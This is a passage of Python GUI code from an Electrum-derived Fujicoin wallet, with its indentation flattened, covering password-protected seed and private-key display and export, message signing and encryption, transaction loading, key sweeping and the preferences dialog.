grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Fujicoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Fujicoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a fujicoin URI
if str(data).startswith("fujicoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
#traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 FJC = 1000 mFJC. 1 mFJC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
